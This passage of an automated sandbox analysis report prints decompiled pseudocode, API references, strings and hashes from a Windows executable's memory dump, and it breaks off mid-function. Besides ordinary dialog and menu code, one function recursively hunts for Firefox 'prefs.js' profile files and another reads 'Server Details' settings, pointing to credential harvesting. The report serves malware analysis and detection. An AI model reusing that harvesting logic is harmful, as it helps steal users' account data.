					if(_t27 == 0) {
						return __ecx + 0x314;
					}
					_t29 = _t27 - 1;
					if(_t29 == 0) {
						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
						if(_t49 < 1 || _t49 > 7) {
							if(_t49 < 8 || _t49 > 0xe) {
								if(_t49 < 0xf || _t49 > 0x19) {
									if(_t49 < 0x1a || _t49 > 0x2d) {
										if(_t49 < 0x2e) {
											L16:
											return _t47;
										}
										_t42 = 0x519;
									} else {
										_t42 = 0x518;
									}
								} else {
									_t42 = 0x517;
								}
							} else {
								_t42 = 0x516;
							}
							goto L20;
						} else {
							_t42 = 0x515;
							L20:
							return E004078FF(_t42);
						}
					}
					_t32 = _t29 - 1;
					if(_t32 == 0) {
						return __ecx + 0x190;
					}
					if(_t32 != 1) {
						goto L16;
					}
					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
					L14:
					if(_t50 != 0) {
						_push(0xa);
						_push(_t47);
						_push(_t50);
						L0041158E();
					}
					goto L16;
				}
				if(_t57 == 0) {
					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
					goto L20;
				}
				if(_t22 == 0xfffffff6) {
					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
					goto L16;
				}
				if(_t22 == 0) {
					return __ecx + 0xc;
				}
				if(_t22 == 1) {
					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
					goto L20;
				}
				if(_t22 == 2) {
					return __ecx + 0x90;
				}
				if(_t22 == 3) {
					return __ecx + 0x110;
				}
				if(_t22 == 4) {
					_t50 =  *((intOrPtr*)(__ecx + 0x394));
					goto L14;
				}
				if(_t22 != 5) {
					goto L16;
				}
				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
					_push(0x10);
				} else {
					_push(0xf);
				}
				_pop(_t42);
				goto L20;
			}

0x00402221
0x00402225
0x0040222b
0x0040222f
0x00402231
0x00402234
0x00402312
0x00402315
0x00000000
0x004023c2
0x0040231b
0x0040231c
0x00000000
0x004023ba
0x00402322
0x00402323
0x00000000
0x004023b2
0x00402329
0x0040232a
0x00402349
0x00402352
0x00402366
0x0040237a
0x0040238e
0x004023a2
0x0040228e
0x00000000
0x0040228e
0x004023a8
0x00402395
0x00402395
0x00402395
0x00402381
0x00402381
0x00402381
0x0040236d
0x0040236d
0x0040236d
0x00000000
0x00402359
0x00402359
0x004022b7
0x00000000
0x004022b7
0x00402352
0x0040232c
0x0040232d
0x00000000
0x00402341
0x00402330
0x00000000
0x00000000
0x00402336
0x0040227e
0x00402280
0x00402282
0x00402284
0x00402285
0x00402286
0x0040228b
0x00000000
0x00402280
0x0040223a
0x0040230a
0x00000000
0x0040230a
0x00402243
0x004022d5
0x004022fa
0x00000000
0x004022ff
0x0040224b
0x00000000
0x004022c1
0x00402250
0x004022b1
0x00000000
0x004022b1
0x00402255
0x00000000
0x004022a0
0x0040225a
0x00000000
0x00402295
0x0040225f
0x00402278
0x00000000
0x00402278
0x00402264
0x00000000
0x00000000
0x0040226d
0x00402274
0x0040226f
0x0040226f
0x0040226f
0x00402271
0x00000000

APIs

_ultoa.MSVCRT ref: 00402286
sprintf.MSVCRT ref: 004022FA

Strings

%s %s %s, xrefs: 004022F4

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _ultoasprintf
String ID: %s %s %s
API String ID: 432394123-3850900253
Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B

Uniqueness

Uniqueness Score: -1.00%

Function 00409B31, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00409B31(intOrPtr* __eax, void* __edx, void* __edi, char* _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				char _v117;
				void* __ebx;
				void* __esi;
				void* _t35;
				void* _t65;
				void* _t67;
				void* _t83;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t88;
				intOrPtr _t95;

				_t83 = __edi;
				_t82 = __edx;
				_t1 =  &_v117;
				 *_t1 = _v117 + __edx;
				_t95 =  *_t1;
				_push(_t70);
				_v12 = _v12 & 0x00000000;
				_t88 = __eax;
				E0040892D(__eax, _t95);
				_t34 = _a4;
				if( *_a4 == 0) {
					_t35 = GetStdHandle(0xfffffff5);
				} else {
					_t35 = E00405EE4(_t34);
				}
				_t65 = _t35;
				_v8 = _t35;
				if(_t65 == 0xffffffff) {
					__eflags = 0;
					E00405F41(0, 0);
				} else {
					_push(_t83);
					_v12 = 1;
					E00405E2C();
					_t84 = _a8;
					if(_t84 == 4 || _t84 == 5) {
						 *((intOrPtr*)( *_t88 + 0x50))(_t65, _t84);
					}
					if(_t84 == 6) {
						 *((intOrPtr*)( *_t88 + 0x24))(_t65);
					}
					 *((intOrPtr*)( *_t88 + 0x80))(_t65, _t84);
					if(_t84 != 2) {
						L13:
						if(_t84 == 7 &&  *((intOrPtr*)(_t88 + 0x1bc)) != 0) {
							E004091CB(_t88, _t82, _t88, _v8, 0);
						}
					} else {
						if( *((intOrPtr*)(_t88 + 0x1bc)) != 0) {
							E004090AE(0, _t88, _t65);
							goto L13;
						}
					}
					_t67 = 0;
					if( *((intOrPtr*)(_t88 + 0x28)) > 0) {
						do {
							_t86 =  *((intOrPtr*)( *_t88 + 0x64))(_t67);
							_push(_t86);
							if( *((intOrPtr*)( *_t88 + 0x2c))() == 0) {
								goto L19;
							} else {
								_push(_a8);
								_push(_t86);
								_push(_v8);
								if( *((intOrPtr*)( *_t88 + 0x78))() == 0) {
									_v12 = _v12 & 0x00000000;
									__eflags = 0;
									E00405F41(0, 0);
								} else {
									goto L19;
								}
							}
							L22:
							_t84 = _a8;
							goto L23;
							L19:
							_t67 = _t67 + 1;
						} while (_t67 <  *((intOrPtr*)(_t88 + 0x28)));
						goto L22;
					}
					L23:
					if(_t84 == 4 || _t84 == 5) {
						 *((intOrPtr*)( *_t88 + 0x4c))(_v8, _t84);
					}
					if(_t84 == 6) {
						 *((intOrPtr*)( *_t88 + 0x28))(_v8);
					}
					if( *_a4 != 0) {
						CloseHandle(_v8);
					}
					SetCursor( *0x416b98);
				}
				return _v12;
			}

0x00409b31
0x00409b31
0x00409b31
0x00409b31
0x00409b31
0x00409b36
0x00409b37
0x00409b3d
0x00409b41
0x00409b46
0x00409b4c
0x00409b59
0x00409b4e
0x00409b4f
0x00409b54
0x00409b5f
0x00409b64
0x00409b67
0x00409c67
0x00409c69
0x00409b6d
0x00409b6d
0x00409b6e
0x00409b75
0x00409b7a
0x00409b80
0x00409b8d
0x00409b8d
0x00409b93
0x00409b9a
0x00409b9a
0x00409ba3
0x00409bac
0x00409bbf
0x00409bc2
0x00409bd4
0x00409bd4
0x00409bae
0x00409bb5
0x00409bba
0x00000000
0x00409bba
0x00409bb5
0x00409bd9
0x00409bde
0x00409be0
0x00409be8
0x00409bec
0x00409bf4
0x00000000
0x00409bf6
0x00409bf6
0x00409bfb
0x00409bfc
0x00409c06
0x00409c10
0x00409c16
0x00409c18
0x00000000
0x00000000
0x00000000
0x00409c06
0x00409c1e
0x00409c1e
0x00000000
0x00409c08
0x00409c08
0x00409c09
0x00000000
0x00409c0e
0x00409c21
0x00409c24
0x00409c33
0x00409c33
0x00409c3a
0x00409c43
0x00409c43
0x00409c4c
0x00409c51
0x00409c51
0x00409c5d
0x00409c5d
0x00409c75

APIs

Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15

GetStdHandle.KERNEL32(000000F5,00000000,00000000,00412466,00412466,?,0040B99D,00412466,00000000,00000000,?,00000000,00000000,?,?), ref: 00409B59
CloseHandle.KERNEL32(00000000,0040B99D,00412466,00000000,00000000,?,00000000,00000000,?,?,?,0040BAC6), ref: 00409C51
SetCursor.USER32(0040B99D,00412466,00000000,00000000,?,00000000,00000000,?,?,?,0040BAC6), ref: 00409C5D

Part of subcall function 00405EE4: CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6

Strings

Mt, xrefs: 00409C1E, 00409C2D

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Handle$??2@??3@CloseCreateCursorFile
String ID: Mt
API String ID: 4067408976-2848310829
Opcode ID: fb5b1f41ede5ba966f4ef990081e8166be1fabdad8e2c07deeaf4ba3e7ce9da2
Instruction ID: 4592fb003901eec9269f960b49d202178d728a436041e1f91cd6dc93122dc868
Opcode Fuzzy Hash: fb5b1f41ede5ba966f4ef990081e8166be1fabdad8e2c07deeaf4ba3e7ce9da2
Instruction Fuzzy Hash: C0419530B04100AFDB259F69D888A5E77F6BF45320F25446EF446A72E2C778AD80CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D37A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040D37A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				char _v1296;
				signed int _v1300;
				void* __esi;
				char* _t26;
				intOrPtr* _t43;

				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t43 = __ecx;
				E00406E68( &_v1300, __eflags, "*.*", _a4);
				while(E00406EC3( &_v1300) != 0) {
					__eflags = E00406E2D( &_v1300);
					if(__eflags == 0) {
						__eflags = _a8 - 1;
						if(_a8 > 1) {
							_t26 =  &_v928;
							_push("prefs.js");
							_push(_t26);
							L004115B2();
							__eflags = _t26;
							if(_t26 == 0) {
								__eflags = E0040614B( &_v652);
								if(__eflags != 0) {
									E0040D1EC(_t43, __eflags,  &_v652);
								}
							}
						}
					} else {
						_a8 = _a8 + 1;
						E0040D37A(_t43, __eflags,  &_v652, _a8);
					}
				}
				E00406F5B( &_v1300);
				return 1;
			}

0x0040d386
0x0040d391
0x0040d395
0x0040d39c
0x0040d3ac
0x0040d3ae
0x0040d418
0x0040d3be
0x0040d3c0
0x0040d3d9
0x0040d3dd
0x0040d3df
0x0040d3e6
0x0040d3eb
0x0040d3ec
0x0040d3f1
0x0040d3f5
0x0040d404
0x0040d407
0x0040d413
0x0040d413
0x0040d407
0x0040d3f5
0x0040d3c2
0x0040d3c2
0x0040d3d2
0x0040d3d2
0x0040d3c0
0x0040d429
0x0040d435

Strings

prefs.js, xrefs: 0040D3E6
*.*, xrefs: 0040D3A3

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strlen$FileFindFirst
String ID: *.*$prefs.js
API String ID: 2516927864-1592826420
Opcode ID: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
Instruction ID: f0fdac10561689b7590a9d658f3f63ad40faf00aab35cef1d8d79f75c7dff1a2
Opcode Fuzzy Hash: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
Instruction Fuzzy Hash: 2711E731408349AAD720EAA5C8019DB77DC9F85324F00493FF869E21C1DB38E61E87AB

Uniqueness

Uniqueness Score: -1.00%

Function 00406680, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				char* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v64 = _v64 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v56 = _t23;
				_v32 = _a8;
				_v20 = _a12;
				_v76 = _t34;
				_v80 = 0x4c;
				_v68 = _a4;
				_v52 = _t38;
				_v48 = 0x104;
				_v28 = 0x80806;
				if(GetSaveFileNameA( &_v80) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v56;
					}
					strcpy(_t38, _v52);
					return 1;
				}
			}

0x00406680
0x00406680
0x00406680
0x00406688
0x0040668b
0x0040668d
0x0040668d
0x0040668f
0x00406693
0x00406697
0x0040669b
0x004066a1
0x004066a7
0x004066aa
0x004066b4
0x004066bb
0x004066be
0x004066c1
0x004066c8
0x004066d7
0x004066f5
0x004066d9
0x004066db
0x004066e0
0x004066e0
0x004066e6
0x004066f1
0x004066f1

APIs

GetSaveFileNameA.COMDLG32(?), ref: 004066CF
strcpy.MSVCRT(?,?), ref: 004066E6

Strings

L, xrefs: 004066B4

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileNameSavestrcpy
String ID: L
API String ID: 1182090483-2909332022
Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADB3(void* __ebx, void* __eflags) {
				char _v265;
				char _v526;
				char _v787;
				void _v1048;
				void _v3648;
				intOrPtr _v3652;
				char _v3660;
				void* _t30;

				_t30 = __ebx;
				_v3660 = 0x41300c;
				memset( &_v3648, 0, 0x10);
				_v1048 = 0;
				_v787 = 0;
				_v526 = 0;
				_v265 = 0;
				_v3652 = 0x6c;
				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
				}
				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
				return E0040143D( &_v3660);
			}

0x0040adb3
0x0040adc9
0x0040add3
0x0040ade7
0x0040adee
0x0040adf5
0x0040adfc
0x0040ae03
0x0040ae1e
0x0040ae2d
0x0040ae4a
0x0040ae4a
0x0040ae5b
0x0040ae6f

APIs

memset.MSVCRT ref: 0040ADD3
SetFocus.USER32(?,?), ref: 0040AE5B

Part of subcall function 0040AD9D: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040ADAC

Strings

l, xrefs: 0040AE03

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FocusMessagePostmemset
String ID: l
API String ID: 3436799508-2517025534
Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408441, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408441(void** __esi, struct HWND__* _a4) {
				long _v12;
				signed int _v24;
				signed int _v28;
				short _v32;
				void* _v40;
				long _t17;
				short* _t23;
				int _t24;
				void** _t25;

				_t25 = __esi;
				_t24 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							_t23 =  *_t25 + _t24 * 4;
							_v40 = 0x22;
							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
							if(_t17 != 0) {
								 *_t23 = _v32;
								_t17 = _v12;
								 *(_t23 + 2) = _t17;
							}
							_t24 = _t24 + 1;
						} while (_t24 < _t25[1]);
					}
				}
				return _t17;
			}

0x00408441
0x00408449
0x0040844e
0x0040845a
0x00408465
0x00408467
0x00408469
0x0040846d
0x00408471
0x00408481
0x00408488
0x00408490
0x00408496
0x00408499
0x0040849d
0x0040849d
0x004084a1
0x004084a2
0x00408467
0x00408465
0x004084aa

APIs

memset.MSVCRT ref: 0040845A
SendMessageA.USER32(?,00001019,00000000,?), ref: 00408488

Strings

", xrefs: 00408481

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: MessageSendmemset
String ID: "
API String ID: 568519121-123907689
Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00406618, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				_v20 = 0x413008;
				if(GetOpenFileNameA( &_v80) == 0) {
					return 0;
				} else {
					strcpy(__esi, _v52);
					return 1;
				}
			}

0x0040661e
0x00406624
0x00406629
0x0040662c
0x0040662f
0x00406635
0x0040663c
0x00406643
0x0040664a
0x0040664d
0x00406654
0x0040665b
0x0040666a
0x0040667f
0x0040666c
0x00406670
0x0040667b
0x0040667b

APIs

GetOpenFileNameA.COMDLG32(?), ref: 00406662
strcpy.MSVCRT(?,?), ref: 00406670

Strings

L, xrefs: 0040663C

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileNameOpenstrcpy
String ID: L
API String ID: 812585365-2909332022
Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98

Uniqueness

Uniqueness Score: -1.00%

Function 00407BB9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32 ref: 00407BC1
sprintf.MSVCRT ref: 00407BE4

Part of subcall function 00407A64: GetMenuItemCount.USER32 ref: 00407A7A
Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
Part of subcall function 00407A64: GetMenuItemInfoA.USER32 ref: 00407AD4
Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84

Strings

menu_%d, xrefs: 00407BDA

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
String ID: menu_%d
API String ID: 3671758413-2417748251
Opcode ID: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
Instruction ID: 3be60505ea2565ef11dfa3f51dd36ce0e69a3f53bb310b440500eec60165980c
Opcode Fuzzy Hash: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
Instruction Fuzzy Hash: 9FD01D71A4D14037D72033356D09FCF19794BD3B15F5440A9F200722D1D57C5755857D

Uniqueness

Uniqueness Score: -1.00%

Function 00406325, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406325(char* _a4) {

				if( *0x417550 == 0) {
					 *0x417658 = GetWindowsDirectoryA(0x417550, 0x104);
				}
				strcpy(_a4, 0x417550);
				return  *0x417658;
			}

0x00406332
0x00406340
0x00406340
0x0040634a
0x00406357

APIs

GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A

Strings

PuA, xrefs: 0040632D

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DirectoryWindowsstrcpy
String ID: PuA
API String ID: 531766897-3228437271
Opcode ID: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
Instruction ID: dc620c75b08fae7ca861cc569808ec9e0c9c78cdcec5c9dc17d9b47d99426002
Opcode Fuzzy Hash: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
Instruction Fuzzy Hash: D2D0A77184E2907FE3015728BC45AC63FB5DB05330F10807BF508A25A0E7741C90879C

Uniqueness

Uniqueness Score: -1.00%

Function 00405EFD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EFD(void* _a4, void* _a8) {
				long _v8;

				return WriteFile(_a4, _a8, strlen(_a8),  &_v8, 0);
			}

0x00405f1e

APIs

strlen.MSVCRT ref: 00405F0A
WriteFile.KERNEL32(00412B1C,00000001,00000000,Mt,00000000,?,?,004092ED,00000001,00412B1C,74E04DE0), ref: 00405F17

Strings

Mt, xrefs: 00405F03, 00405F06

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileWritestrlen
String ID: Mt
API String ID: 672350951-2848310829
Opcode ID: bfb419fbad8ca6445dae4110cd1fbba1178bf049d9565f24e75ea22fb62dd88e
Instruction ID: 2b3ebbf9e30e05915e077597dedd35386465248c0d2ecc4ed1309323ba2d91a7
Opcode Fuzzy Hash: bfb419fbad8ca6445dae4110cd1fbba1178bf049d9565f24e75ea22fb62dd88e
Instruction Fuzzy Hash: 72D0C97110010CBFEF019F41EC06EE93F6EEB04254F108125BA0699060EBB1AE50DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408348, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408348(char* __esi) {
				char* _t2;
				char* _t6;

				_t6 = __esi;
				E00406160(__esi);
				_t2 = strrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 = 0;
				}
				return strcat(_t6, "_lng.ini");
			}

0x00408348
0x00408349
0x00408351
0x0040835b
0x0040835d
0x0040835d
0x0040836d

APIs

Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B

strrchr.MSVCRT ref: 00408351
strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366

Strings

_lng.ini, xrefs: 00408360

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileModuleNamestrcatstrrchr
String ID: _lng.ini
API String ID: 3097366151-1948609170
Opcode ID: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
Instruction ID: a8d2890f819e62600bf11f9c0364550bfc67884382c2ab22ce71db24782b6e2f
Opcode Fuzzy Hash: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
Instruction Fuzzy Hash: 37C01275686A5438D11622355E03B8F01454F52745F24409BF903391D6DE5D569141AE

Uniqueness

Uniqueness Score: -1.00%

Function 00403397, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403397(CHAR* _a4, CHAR* _a8, char _a12) {

				_t2 =  &_a12; // 0x403428
				return GetPrivateProfileStringA("Server Details", _a8, 0x412466,  *_t2, 0x7f, _a4);
			}

0x0040339d
0x004033b5

APIs

GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF

Strings

(4@, xrefs: 0040339D
Server Details, xrefs: 004033AA

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfileString
String ID: (4@$Server Details
API String ID: 1096422788-3984282551
Opcode ID: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
Instruction ID: 5387a3ffe087b7673ef104c15d829f3f0df010b9e50aa15a0af8b6122c5a167a
Opcode Fuzzy Hash: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
Instruction Fuzzy Hash: A0C04031544301FAC5114F909F05E4D7F516B54B40F118415B24450065C1E54574DB26

Uniqueness

Uniqueness Score: -1.00%

Function 004084CE, Relevance: 5.1, APIs: 4, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004084CE(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x413320;
				_t22 = E00406549(0x1c8, __esi);
				_push(0x14);
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
